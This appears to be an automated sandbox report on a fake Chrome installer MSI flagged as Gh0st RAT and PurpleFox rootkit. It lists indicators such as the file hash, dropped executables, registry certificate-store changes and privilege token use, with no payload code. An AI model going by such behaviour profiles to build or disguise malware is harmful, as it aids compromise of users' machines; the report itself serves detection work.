Malware Analysis Report

2024-12-07 13:44

Sample ID 241118-lxswpaypgp
Target ChromeSetupz.5516.25.msi.vir
SHA256 08734e0c77e055be3c43066f2cbcfd84537a819434d1e1f6d41c984ff7a4d865
Tags
discovery execution persistence privilege_escalation gh0strat purplefox evasion rat rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08734e0c77e055be3c43066f2cbcfd84537a819434d1e1f6d41c984ff7a4d865

Threat Level: Known bad

The file ChromeSetupz.5516.25.msi.vir was found to be: Known bad.

Malicious Activity Summary

discovery execution persistence privilege_escalation gh0strat purplefox evasion rat rootkit spyware stealer trojan

Gh0strat

Gh0strat family

Gh0st RAT payload

Purplefox family

Detect PurpleFox Rootkit

PurpleFox

Command and Scripting Interpreter: PowerShell

Enumerates connected drives

Boot or Logon Autostart Execution: Active Setup

Event Triggered Execution: Component Object Model Hijacking

Drops file in System32 directory

Loads dropped DLL

Drops file in Windows directory

Executes dropped EXE

Drops file in Program Files directory

Checks installed software on the system

Checks system information in the registry

Reads user/profile data of web browsers

Checks whether UAC is enabled

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Installer Packages

Browser Information Discovery

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Runs ping.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam

Uses Volume Shadow Copy service COM API

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-18 09:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-18 09:55

Reported

2024-11-18 09:58

Platform

win7-20241023-en

Max time kernel

121s

Max time network

124s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\XjPDFEditCore.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File created C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76fbb0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFDA0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76fbae.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76fbad.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76fbad.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76fbae.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 9066b515a039db01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\PackageCode = "057E34CA8B228F74186C96793AFD7D82" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Version = "524290" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\6785353EFDC7D474B987CFA4A9EDDFC7\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FB24B910C1788D5469B1AA3A1A3667BB C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\ProductName = "DriveHumbleTechnician" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FB24B910C1788D5469B1AA3A1A3667BB\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\PackageName = "ChromeSetupz.5516.25.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
